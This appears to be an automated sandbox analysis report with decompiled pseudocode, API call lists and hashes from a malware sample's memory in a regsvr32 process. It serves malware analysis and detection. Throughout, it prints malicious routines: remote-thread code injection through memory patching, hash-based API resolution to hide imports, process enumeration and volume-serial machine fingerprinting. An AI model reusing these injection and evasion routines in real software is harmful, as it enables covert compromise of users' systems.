                                                                                                                                                                        					_t66 = _t192 + 0x1878; // 0x1878
                                                                                                                                                                        					_t191 = 0x14;
                                                                                                                                                                        					E049E96DA(_t66, _t191);
                                                                                                                                                                        					_t134 = E049EDAE3(_t191); // executed
                                                                                                                                                                        					 *((intOrPtr*)(_t192 + 0x1898)) = _t134;
                                                                                                                                                                        					return _t192;
                                                                                                                                                                        				}
                                                                                                                                                                        				return _t68;
                                                                                                                                                                        			}























































                                                                                                                                                                        0x049edffe
                                                                                                                                                                        0x049ee004
                                                                                                                                                                        0x049ee009
                                                                                                                                                                        0x049ee00f
                                                                                                                                                                        0x049ee014
                                                                                                                                                                        0x049ee01a
                                                                                                                                                                        0x049ee01a
                                                                                                                                                                        0x049ee023
                                                                                                                                                                        0x049ee029
                                                                                                                                                                        0x049ee02d
                                                                                                                                                                        0x049ee034
                                                                                                                                                                        0x049ee03b
                                                                                                                                                                        0x049ee042
                                                                                                                                                                        0x049ee046
                                                                                                                                                                        0x049ee04d
                                                                                                                                                                        0x049ee04e
                                                                                                                                                                        0x049ee050
                                                                                                                                                                        0x049ee055
                                                                                                                                                                        0x049ee05c
                                                                                                                                                                        0x049ee05e
                                                                                                                                                                        0x049ee05e
                                                                                                                                                                        0x049ee06e
                                                                                                                                                                        0x049ee073
                                                                                                                                                                        0x049ee073
                                                                                                                                                                        0x049ee080
                                                                                                                                                                        0x049ee086
                                                                                                                                                                        0x049ee08b
                                                                                                                                                                        0x049ee08d
                                                                                                                                                                        0x049ee096
                                                                                                                                                                        0x049ee096
                                                                                                                                                                        0x049ee09e
                                                                                                                                                                        0x049ee0a3
                                                                                                                                                                        0x049ee0a3
                                                                                                                                                                        0x049ee0a9
                                                                                                                                                                        0x049ee0b4
                                                                                                                                                                        0x049ee0b9
                                                                                                                                                                        0x049ee0c1
                                                                                                                                                                        0x049ee0c7
                                                                                                                                                                        0x049ee0cf
                                                                                                                                                                        0x049ee0e1
                                                                                                                                                                        0x049ee0e7
                                                                                                                                                                        0x049ee0ef
                                                                                                                                                                        0x049ee0f4
                                                                                                                                                                        0x049ee101
                                                                                                                                                                        0x049ee112
                                                                                                                                                                        0x049ee118
                                                                                                                                                                        0x049ee11d
                                                                                                                                                                        0x049ee120
                                                                                                                                                                        0x049ee123
                                                                                                                                                                        0x049ee130
                                                                                                                                                                        0x049ee136
                                                                                                                                                                        0x049ee140
                                                                                                                                                                        0x049ee140
                                                                                                                                                                        0x049ee146
                                                                                                                                                                        0x049ee14e
                                                                                                                                                                        0x049ee159
                                                                                                                                                                        0x049ee15e
                                                                                                                                                                        0x049ee164
                                                                                                                                                                        0x049ee166
                                                                                                                                                                        0x049ee173
                                                                                                                                                                        0x049ee174
                                                                                                                                                                        0x049ee175
                                                                                                                                                                        0x049ee180
                                                                                                                                                                        0x049ee182
                                                                                                                                                                        0x049ee189
                                                                                                                                                                        0x049ee189
                                                                                                                                                                        0x049ee193
                                                                                                                                                                        0x049ee198
                                                                                                                                                                        0x049ee19d
                                                                                                                                                                        0x049ee19d
                                                                                                                                                                        0x049ee1a3
                                                                                                                                                                        0x049ee1aa
                                                                                                                                                                        0x049ee1ab
                                                                                                                                                                        0x049ee1b8
                                                                                                                                                                        0x049ee1cb
                                                                                                                                                                        0x049ee1d0
                                                                                                                                                                        0x049ee1d5
                                                                                                                                                                        0x049ee1de
                                                                                                                                                                        0x049ee1de
                                                                                                                                                                        0x049ee1e4
                                                                                                                                                                        0x049ee1e9
                                                                                                                                                                        0x049ee1ef
                                                                                                                                                                        0x049ee1f5
                                                                                                                                                                        0x049ee1fa
                                                                                                                                                                        0x049ee203
                                                                                                                                                                        0x049ee205
                                                                                                                                                                        0x049ee20c
                                                                                                                                                                        0x049ee20c
                                                                                                                                                                        0x049ee212
                                                                                                                                                                        0x049ee21a
                                                                                                                                                                        0x049ee21f
                                                                                                                                                                        0x049ee220
                                                                                                                                                                        0x049ee225
                                                                                                                                                                        0x049ee22e
                                                                                                                                                                        0x049ee230
                                                                                                                                                                        0x049ee23b
                                                                                                                                                                        0x049ee23b
                                                                                                                                                                        0x049ee244
                                                                                                                                                                        0x049ee24c
                                                                                                                                                                        0x049ee253
                                                                                                                                                                        0x049ee258
                                                                                                                                                                        0x049ee267
                                                                                                                                                                        0x049ee27f
                                                                                                                                                                        0x049ee286
                                                                                                                                                                        0x049ee294
                                                                                                                                                                        0x049ee29f
                                                                                                                                                                        0x049ee2a0
                                                                                                                                                                        0x049ee2a4
                                                                                                                                                                        0x049ee2aa
                                                                                                                                                                        0x049ee2ab
                                                                                                                                                                        0x049ee2b3
                                                                                                                                                                        0x049ee2b8
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049ee2c0
                                                                                                                                                                        0x049ee2c4

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 049E8BDE: RtlAllocateHeap.NTDLL(00000008,?,?,049E959D,00000100,?,049E6507), ref: 049E8BEC
                                                                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 049EDF64
                                                                                                                                                                        • GetLastError.KERNEL32 ref: 049EE05E
                                                                                                                                                                        • GetSystemMetrics.USER32(00001000), ref: 049EE06E
                                                                                                                                                                        • GetVersionExA.KERNEL32(00000000), ref: 049EE123
                                                                                                                                                                          • Part of subcall function 049EC8C9: FindCloseChangeNotification.KERNELBASE(?,00001644,00000000,049E0000), ref: 049EC96D
                                                                                                                                                                        • GetWindowsDirectoryW.KERNEL32(00001020,00000104), ref: 049EE14E
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001A.00000002.494976271.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049E0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_26_2_49e0000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AllocateChangeCloseCurrentDirectoryErrorFindHeapLastMetricsNotificationProcessSystemVersionWindows
                                                                                                                                                                        • String ID: %s\%s$SystemDrive$TEMP$TEMP$USERPROFILE
                                                                                                                                                                        • API String ID: 3131805607-2706916422
                                                                                                                                                                        • Opcode ID: 94f07fe23e1edd1205d0b4ff0344f36414aeab73dc337f706d70f9c7fbfd701c
                                                                                                                                                                        • Instruction ID: b01aaacf52b1f8791541ee28993f5ce9e922470bdff9220be20367ca074b59f1
                                                                                                                                                                        • Opcode Fuzzy Hash: 94f07fe23e1edd1205d0b4ff0344f36414aeab73dc337f706d70f9c7fbfd701c
                                                                                                                                                                        • Instruction Fuzzy Hash: A2917D71700605AFE705EB75D848FEABBE8FF88304F00417AE51AD7241DB74BA458BA5
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 143 49ed959-49ed972 call 49ed218 146 49eda4b-49eda56 call 49ed38b 143->146 147 49ed978-49ed986 call 49ed447 143->147 147->146 152 49ed98c-49ed9c3 call 49e8d6d GetThreadContext 147->152 152->146 155 49ed9c9-49eda09 NtProtectVirtualMemory 152->155 156 49eda0b-49eda26 NtWriteVirtualMemory 155->156 157 49eda49 155->157 156->157 158 49eda28-49eda47 NtProtectVirtualMemory 156->158 157->146 158->146 158->157
                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E049ED959(void* __ecx, void** __edx, void* __eflags, intOrPtr _a4) {
                                                                                                                                                                        				long _v8;
                                                                                                                                                                        				long _v12;
                                                                                                                                                                        				void* _v16;
                                                                                                                                                                        				intOrPtr _v23;
                                                                                                                                                                        				void _v24;
                                                                                                                                                                        				long _v28;
                                                                                                                                                                        				struct _CONTEXT _v744;
                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                        				void* __edi;
                                                                                                                                                                        				void* __esi;
                                                                                                                                                                        				void* _t33;
                                                                                                                                                                        				void* _t57;
                                                                                                                                                                        				long _t59;
                                                                                                                                                                        				void* _t62;
                                                                                                                                                                        				void** _t65;
                                                                                                                                                                        				void* _t66;
                                                                                                                                                                        
                                                                                                                                                                        				_t65 = __edx;
                                                                                                                                                                        				_t57 = __ecx;
                                                                                                                                                                        				_t66 = 0;
                                                                                                                                                                        				if(E049ED218(__ecx, __edx, __edx, 0) != 0) {
                                                                                                                                                                        					_t33 = E049ED447( *((intOrPtr*)(__edx)), _a4); // executed
                                                                                                                                                                        					_t66 = _t33;
                                                                                                                                                                        					if(_t66 != 0) {
                                                                                                                                                                        						E049E8D6D( &_v744, 0, 0x2cc);
                                                                                                                                                                        						_v744.ContextFlags = 0x10002;
                                                                                                                                                                        						if(GetThreadContext(_t65[1],  &_v744) != 0) {
                                                                                                                                                                        							_t62 = _v744.Eax;
                                                                                                                                                                        							_v12 = _v12 & 0x00000000;
                                                                                                                                                                        							_v24 = 0xe9;
                                                                                                                                                                        							_t59 = 5;
                                                                                                                                                                        							_v23 = _t66 - _t62 - _a4 + _t57 + 0xfffffffb;
                                                                                                                                                                        							_v8 = _t59;
                                                                                                                                                                        							_v16 = _t62;
                                                                                                                                                                        							if(NtProtectVirtualMemory( *_t65,  &_v16,  &_v8, 4,  &_v12) < 0 || NtWriteVirtualMemory( *_t65, _v744.Eax,  &_v24, _t59,  &_v8) < 0) {
                                                                                                                                                                        								L6:
                                                                                                                                                                        								_t66 = 0;
                                                                                                                                                                        							} else {
                                                                                                                                                                        								_v28 = _v28 & 0x00000000;
                                                                                                                                                                        								if(NtProtectVirtualMemory( *_t65,  &_v16,  &_v8, _v12,  &_v28) < 0) {
                                                                                                                                                                        									goto L6;
                                                                                                                                                                        								}
                                                                                                                                                                        							}
                                                                                                                                                                        						}
                                                                                                                                                                        					}
                                                                                                                                                                        				}
                                                                                                                                                                        				E049ED38B();
                                                                                                                                                                        				return _t66;
                                                                                                                                                                        			}




















                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 049ED218: LoadLibraryW.KERNEL32 ref: 049ED312
                                                                                                                                                                          • Part of subcall function 049ED447: NtCreateSection.NTDLL(049ED982,0000000E,00000000,?,00000040,08000000,00000000,?), ref: 049ED4B9
                                                                                                                                                                          • Part of subcall function 049ED447: RegisterClassExA.USER32(?), ref: 049ED50D
                                                                                                                                                                          • Part of subcall function 049ED447: CreateWindowExA.USER32 ref: 049ED538
                                                                                                                                                                          • Part of subcall function 049ED447: DestroyWindow.USER32(00000000), ref: 049ED543
                                                                                                                                                                          • Part of subcall function 049ED447: UnregisterClassA.USER32 ref: 049ED54E
                                                                                                                                                                          • Part of subcall function 049E8D6D: memset.MSVCRT ref: 049E8D7F
                                                                                                                                                                        • GetThreadContext.KERNELBASE(?,00010002,00000000,00000000,00000000), ref: 049ED9BB
                                                                                                                                                                        • NtProtectVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 049EDA04
                                                                                                                                                                        • NtWriteVirtualMemory.NTDLL(?,?,000000E9,00000005,?), ref: 049EDA21
                                                                                                                                                                        • NtProtectVirtualMemory.NTDLL(?,?,?,00000000,00000000), ref: 049EDA42
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001A.00000002.494976271.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049E0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_26_2_49e0000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: MemoryVirtual$ClassCreateProtectWindow$ContextDestroyLibraryLoadRegisterSectionThreadUnregisterWritememset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1578692462-0
                                                                                                                                                                        • Opcode ID: d2d2cb7fbc2ea795c99b18b917fb96bbb869fddd4952cb7482a46b7869d1c1e5
                                                                                                                                                                        • Instruction ID: 369332f5e77e277d2840c995aa785bd2b3e8c82ca3bf10fd71951175039da214
                                                                                                                                                                        • Opcode Fuzzy Hash: d2d2cb7fbc2ea795c99b18b917fb96bbb869fddd4952cb7482a46b7869d1c1e5
                                                                                                                                                                        • Instruction Fuzzy Hash: 5E312D72A0010AAFDB12DFA5D984FEEBBBCEF44314F1042B6E504E6254D730EB459B90
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        C-Code - Quality: 82%
                                                                                                                                                                        			E049EB96A(void* __ecx, void* __edx) {
                                                                                                                                                                        				void* _v304;
                                                                                                                                                                        				void* _v308;
                                                                                                                                                                        				intOrPtr _v312;
                                                                                                                                                                        				signed int _t16;
                                                                                                                                                                        				signed int _t17;
                                                                                                                                                                        				intOrPtr _t30;
                                                                                                                                                                        				void* _t33;
                                                                                                                                                                        				void* _t43;
                                                                                                                                                                        				void* _t45;
                                                                                                                                                                        
                                                                                                                                                                        				_t33 = __edx;
                                                                                                                                                                        				_v304 = __ecx;
                                                                                                                                                                        				_t16 = CreateToolhelp32Snapshot(2, 0);
                                                                                                                                                                        				_t45 = _t16;
                                                                                                                                                                        				_t17 = _t16 | 0xffffffff;
                                                                                                                                                                        				if(_t45 != _t17) {
                                                                                                                                                                        					E049E8D6D( &_v304, 0, 0x128);
                                                                                                                                                                        					_v304 = 0x128;
                                                                                                                                                                        					if(Process32First(_t45,  &_v304) != 0) {
                                                                                                                                                                        						do {
                                                                                                                                                                        							_t43 = _v312( &_v308, _t33);
                                                                                                                                                                        						} while (_t43 != 0 && Process32Next(_t45,  &_v308) != 0);
                                                                                                                                                                        						FindCloseChangeNotification(_t45);
                                                                                                                                                                        						_t17 = 0 | _t43 == 0x00000000;
                                                                                                                                                                        					} else {
                                                                                                                                                                        						_t30 =  *0x49ff818; // 0x4bef8b0
                                                                                                                                                                        						 *((intOrPtr*)(_t30 + 0x30))(_t45);
                                                                                                                                                                        						_t17 = 0xfffffffe;
                                                                                                                                                                        					}
                                                                                                                                                                        				}
                                                                                                                                                                        				return _t17;
                                                                                                                                                                        			}













                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000011,?,00000010), ref: 049EB988
                                                                                                                                                                          • Part of subcall function 049E8D6D: memset.MSVCRT ref: 049E8D7F
                                                                                                                                                                        • Process32First.KERNEL32(00000000,?), ref: 049EB9B8
                                                                                                                                                                        • Process32Next.KERNEL32(00000000,?), ref: 049EB9EB
                                                                                                                                                                        • FindCloseChangeNotification.KERNELBASE(00000000), ref: 049EB9F8
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001A.00000002.494976271.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049E0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_26_2_49e0000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32memset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2518216231-0
                                                                                                                                                                        • Opcode ID: c8a4e39b1eec4b294f1b8df05408f0a8e40366749be93e6bf6170ebe56daad3d
                                                                                                                                                                        • Instruction ID: 75d2530d7da857da32074dfd7cbcc2f013506131b63fdce78905c9a213eae528
                                                                                                                                                                        • Opcode Fuzzy Hash: c8a4e39b1eec4b294f1b8df05408f0a8e40366749be93e6bf6170ebe56daad3d
                                                                                                                                                                        • Instruction Fuzzy Hash: CE11C472204301AFC311DE69EC49EAB7BECFF85360F140A3AF665C7180EB24E90587A5
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 191 49eeebb-49eeed2 192 49eef2f 191->192 193 49eeed4-49eeefc 191->193 195 49eef31-49eef35 192->195 193->192 194 49eeefe-49eef21 call 49ea43d call 49ee2c5 193->194 200 49eef36-49eef4d 194->200 201 49eef23-49eef2d 194->201 202 49eef4f-49eef57 200->202 203 49eefa3-49eefa5 200->203 201->192 201->194 202->203 204 49eef59 202->204 203->195 205 49eef5b-49eef61 204->205 206 49eef63-49eef65 205->206 207 49eef71-49eef82 205->207 206->207 210 49eef67-49eef6f 206->210 208 49eef87-49eef93 LoadLibraryA 207->208 209 49eef84-49eef85 207->209 208->192 211 49eef95-49eef9f GetProcAddress 208->211 209->208 210->205 210->207 211->192 212 49eefa1 211->212 212->195
                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E049EEEBB(void* __ecx, intOrPtr __edx) {
                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                        				intOrPtr _v12;
                                                                                                                                                                        				intOrPtr _v16;
                                                                                                                                                                        				intOrPtr _v20;
                                                                                                                                                                        				intOrPtr _v24;
                                                                                                                                                                        				intOrPtr _v28;
                                                                                                                                                                        				char _v92;
                                                                                                                                                                        				intOrPtr _t41;
                                                                                                                                                                        				signed int _t47;
                                                                                                                                                                        				signed int _t49;
                                                                                                                                                                        				signed int _t51;
                                                                                                                                                                        				void* _t56;
                                                                                                                                                                        				struct HINSTANCE__* _t58;
                                                                                                                                                                        				_Unknown_base(*)()* _t59;
                                                                                                                                                                        				intOrPtr _t60;
                                                                                                                                                                        				void* _t62;
                                                                                                                                                                        				intOrPtr _t63;
                                                                                                                                                                        				void* _t69;
                                                                                                                                                                        				char _t70;
                                                                                                                                                                        				void* _t75;
                                                                                                                                                                        				CHAR* _t80;
                                                                                                                                                                        				void* _t82;
                                                                                                                                                                        
                                                                                                                                                                        				_t75 = __ecx;
                                                                                                                                                                        				_v12 = __edx;
                                                                                                                                                                        				_t60 =  *((intOrPtr*)(__ecx + 0x3c));
                                                                                                                                                                        				_t41 =  *((intOrPtr*)(_t60 + __ecx + 0x78));
                                                                                                                                                                        				if(_t41 == 0) {
                                                                                                                                                                        					L4:
                                                                                                                                                                        					return 0;
                                                                                                                                                                        				}
                                                                                                                                                                        				_t62 = _t41 + __ecx;
                                                                                                                                                                        				_v24 =  *((intOrPtr*)(_t62 + 0x24)) + __ecx;
                                                                                                                                                                        				_t73 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
                                                                                                                                                                        				_t63 =  *((intOrPtr*)(_t62 + 0x18));
                                                                                                                                                                        				_v28 =  *((intOrPtr*)(_t62 + 0x1c)) + __ecx;
                                                                                                                                                                        				_t47 = 0;
                                                                                                                                                                        				_v20 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
                                                                                                                                                                        				_v8 = 0;
                                                                                                                                                                        				_v16 = _t63;
                                                                                                                                                                        				if(_t63 == 0) {
                                                                                                                                                                        					goto L4;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					goto L2;
                                                                                                                                                                        				}
                                                                                                                                                                        				while(1) {
                                                                                                                                                                        					L2:
                                                                                                                                                                        					_t49 = E049EE2C5( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75, E049EA43D( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75), 0);
                                                                                                                                                                        					_t51 = _v8;
                                                                                                                                                                        					if((_t49 ^ 0x218fe95b) == _v12) {
                                                                                                                                                                        						break;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t73 = _v20;
                                                                                                                                                                        					_t47 = _t51 + 1;
                                                                                                                                                                        					_v8 = _t47;
                                                                                                                                                                        					if(_t47 < _v16) {
                                                                                                                                                                        						continue;
                                                                                                                                                                        					}
                                                                                                                                                                        					goto L4;
                                                                                                                                                                        				}
                                                                                                                                                                        				_t69 =  *((intOrPtr*)(_t60 + _t75 + 0x78)) + _t75;
                                                                                                                                                                        				_t80 =  *((intOrPtr*)(_v28 + ( *(_v24 + _t51 * 2) & 0x0000ffff) * 4)) + _t75;
                                                                                                                                                                        				if(_t80 < _t69 || _t80 >=  *((intOrPtr*)(_t60 + _t75 + 0x7c)) + _t69) {
                                                                                                                                                                        					return _t80;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					_t56 = 0;
                                                                                                                                                                        					while(1) {
                                                                                                                                                                        						_t70 = _t80[_t56];
                                                                                                                                                                        						if(_t70 == 0x2e || _t70 == 0) {
                                                                                                                                                                        							break;
                                                                                                                                                                        						}
                                                                                                                                                                        						 *((char*)(_t82 + _t56 - 0x58)) = _t70;
                                                                                                                                                                        						_t56 = _t56 + 1;
                                                                                                                                                                        						if(_t56 < 0x40) {
                                                                                                                                                                        							continue;
                                                                                                                                                                        						}
                                                                                                                                                                        						break;
                                                                                                                                                                        					}
                                                                                                                                                                        					 *((intOrPtr*)(_t82 + _t56 - 0x58)) = 0x6c6c642e;
                                                                                                                                                                        					 *((char*)(_t82 + _t56 - 0x54)) = 0;
                                                                                                                                                                        					if( *((char*)(_t56 + _t80)) != 0) {
                                                                                                                                                                        						_t80 =  &(( &(_t80[1]))[_t56]);
                                                                                                                                                                        					}
                                                                                                                                                                        					_t40 =  &_v92; // 0x6c6c642e
                                                                                                                                                                        					_t58 = LoadLibraryA(_t40); // executed
                                                                                                                                                                        					if(_t58 == 0) {
                                                                                                                                                                        						goto L4;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t59 = GetProcAddress(_t58, _t80);
                                                                                                                                                                        					if(_t59 == 0) {
                                                                                                                                                                        						goto L4;
                                                                                                                                                                        					}
                                                                                                                                                                        					return _t59;
                                                                                                                                                                        				}
                                                                                                                                                                        			}

























                                                                                                                                                                        0x049eef9f

                                                                                                                                                                        APIs
                                                                                                                                                                        • LoadLibraryA.KERNELBASE(.dll,?,00000138,00000000), ref: 049EEF8B
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 049EEF97
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001A.00000002.494976271.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049E0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_26_2_49e0000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                                                                        • String ID: .dll
                                                                                                                                                                        • API String ID: 2574300362-2738580789
                                                                                                                                                                        • Opcode ID: 001248e3c6f5ab05f0caca8e1021e4fdb3974835de07c808d4eaa4c7414039d6
                                                                                                                                                                        • Instruction ID: 87665d69175a01a9e6da8dd0edbdd611c7d2c913a2bfa54572fe175d4e4316e2
                                                                                                                                                                        • Opcode Fuzzy Hash: 001248e3c6f5ab05f0caca8e1021e4fdb3974835de07c808d4eaa4c7414039d6
                                                                                                                                                                        • Instruction Fuzzy Hash: 4C318F71A001159BCF26CFAAC884ABEBBE9AF49304F284879D845E7351E730E9418B94
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        C-Code - Quality: 94%
                                                                                                                                                                        			E049EC5EC(WCHAR* __ecx, WCHAR* __edx) {
                                                                                                                                                                        				long _v8;
                                                                                                                                                                        				long _v12;
                                                                                                                                                                        				WCHAR* _v16;
                                                                                                                                                                        				short _v528;
                                                                                                                                                                        				short _v1040;
                                                                                                                                                                        				short _v1552;
                                                                                                                                                                        				intOrPtr _t23;
                                                                                                                                                                        				WCHAR* _t27;
                                                                                                                                                                        				signed int _t29;
                                                                                                                                                                        				void* _t33;
                                                                                                                                                                        				long _t38;
                                                                                                                                                                        				WCHAR* _t43;
                                                                                                                                                                        				WCHAR* _t56;
                                                                                                                                                                        
                                                                                                                                                                        				_t44 = __ecx;
                                                                                                                                                                        				_v8 = _v8 & 0x00000000;
                                                                                                                                                                        				_t43 = __edx;
                                                                                                                                                                        				_t56 = __ecx;
                                                                                                                                                                        				E049E8D6D(__edx, 0, 0x100);
                                                                                                                                                                        				_v12 = 0x100;
                                                                                                                                                                        				_t23 =  *0x49ff818; // 0x4bef8b0
                                                                                                                                                                        				 *((intOrPtr*)(_t23 + 0xbc))( &_v528,  &_v12);
                                                                                                                                                                        				lstrcpynW(__edx,  &_v528, 0x100);
                                                                                                                                                                        				_t27 = E049E9DF2(_t44, 0xad6);
                                                                                                                                                                        				_v16 = _t27;
                                                                                                                                                                        				_t29 = GetVolumeInformationW(_t27,  &_v1552, 0x100,  &_v8, 0, 0,  &_v1040, 0x100);
                                                                                                                                                                        				asm("sbb eax, eax");
                                                                                                                                                                        				_v8 = _v8 &  ~_t29;
                                                                                                                                                                        				E049E8BAF( &_v16);
                                                                                                                                                                        				_t33 = E049EA456(_t43);
                                                                                                                                                                        				E049E9E51( &(_t43[E049EA456(_t43)]), 0x100 - _t33, L"%u", _v8);
                                                                                                                                                                        				lstrcatW(_t43, _t56);
                                                                                                                                                                        				_t38 = E049EA456(_t43);
                                                                                                                                                                        				_v12 = _t38;
                                                                                                                                                                        				CharUpperBuffW(_t43, _t38);
                                                                                                                                                                        				return E049EE2C5(_t43, E049EA456(_t43) + _t40, 0);
                                                                                                                                                                        			}

















                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 049E8D6D: memset.MSVCRT ref: 049E8D7F
                                                                                                                                                                        • lstrcpynW.KERNEL32(?,?,00000100), ref: 049EC633
                                                                                                                                                                        • GetVolumeInformationW.KERNELBASE(00000000,?,00000100,00000000,00000000,00000000,?,00000100), ref: 049EC665
                                                                                                                                                                          • Part of subcall function 049E9E51: _vsnwprintf.MSVCRT ref: 049E9E6E
                                                                                                                                                                        • lstrcatW.KERNEL32(?,00000114), ref: 049EC69E
                                                                                                                                                                        • CharUpperBuffW.USER32(?,00000000), ref: 049EC6B0
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001A.00000002.494976271.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049E0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_26_2_49e0000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: BuffCharInformationUpperVolume_vsnwprintflstrcatlstrcpynmemset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 455400327-0
                                                                                                                                                                        • Opcode ID: 1ebb51e4b0f18271f5a3ac48ca3439d7fda0b1663f92a39ddd2a5da2c98490c7
                                                                                                                                                                        • Instruction ID: 404c9e89dba1e03f3632c62f3ba7c97270fc4915f5d882ec76c264d70f418f21
                                                                                                                                                                        • Opcode Fuzzy Hash: 1ebb51e4b0f18271f5a3ac48ca3439d7fda0b1663f92a39ddd2a5da2c98490c7
                                                                                                                                                                        • Instruction Fuzzy Hash: CD2188F2A00218BFE711ABB5DC49FFE77BCDB84214F1441B5F505D6180EA74AE448B64
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 213 49ec7f5-49ec815 GetTokenInformation 214 49ec85b 213->214 215 49ec817-49ec820 GetLastError 213->215 216 49ec85d-49ec861 214->216 215->214 217 49ec822-49ec832 call 49e8bde 215->217 220 49ec838-49ec84b GetTokenInformation 217->220 221 49ec834-49ec836 217->221 220->214 222 49ec84d-49ec859 call 49e8bf4 220->222 221->216 222->221
                                                                                                                                                                        C-Code - Quality: 86%
                                                                                                                                                                        			E049EC7F5(union _TOKEN_INFORMATION_CLASS __edx, DWORD* _a4) {
                                                                                                                                                                        				long _v8;
                                                                                                                                                                        				void* _v12;
                                                                                                                                                                        				void* _t12;
                                                                                                                                                                        				void* _t20;
                                                                                                                                                                        				void* _t22;
                                                                                                                                                                        				union _TOKEN_INFORMATION_CLASS _t28;
                                                                                                                                                                        				void* _t31;
                                                                                                                                                                        
                                                                                                                                                                        				_push(_t22);
                                                                                                                                                                        				_push(_t22);
                                                                                                                                                                        				_t31 = 0;
                                                                                                                                                                        				_t28 = __edx;
                                                                                                                                                                        				_t20 = _t22;
                                                                                                                                                                        				if(GetTokenInformation(_t20, __edx, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
                                                                                                                                                                        					L6:
                                                                                                                                                                        					_t12 = _t31;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					_t31 = E049E8BDE(_v8);
                                                                                                                                                                        					_v12 = _t31;
                                                                                                                                                                        					if(_t31 != 0) {
                                                                                                                                                                        						if(GetTokenInformation(_t20, _t28, _t31, _v8, _a4) != 0) {
                                                                                                                                                                        							goto L6;
                                                                                                                                                                        						} else {
                                                                                                                                                                        							E049E8BF4( &_v12, _t16);
                                                                                                                                                                        							goto L3;
                                                                                                                                                                        						}
                                                                                                                                                                        					} else {
                                                                                                                                                                        						L3:
                                                                                                                                                                        						_t12 = 0;
                                                                                                                                                                        					}
                                                                                                                                                                        				}
                                                                                                                                                                        				return _t12;
                                                                                                                                                                        			}











                                                                                                                                                                        APIs
                                                                                                                                                                        • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,00000000,00001644,049E0000,00000000,00000000,?,049EC876,00000000,00000000,?,049EC89F), ref: 049EC810
                                                                                                                                                                        • GetLastError.KERNEL32(?,049EC876,00000000,00000000,?,049EC89F,00001644,?,049EDFCE), ref: 049EC817
                                                                                                                                                                          • Part of subcall function 049E8BDE: RtlAllocateHeap.NTDLL(00000008,?,?,049E959D,00000100,?,049E6507), ref: 049E8BEC
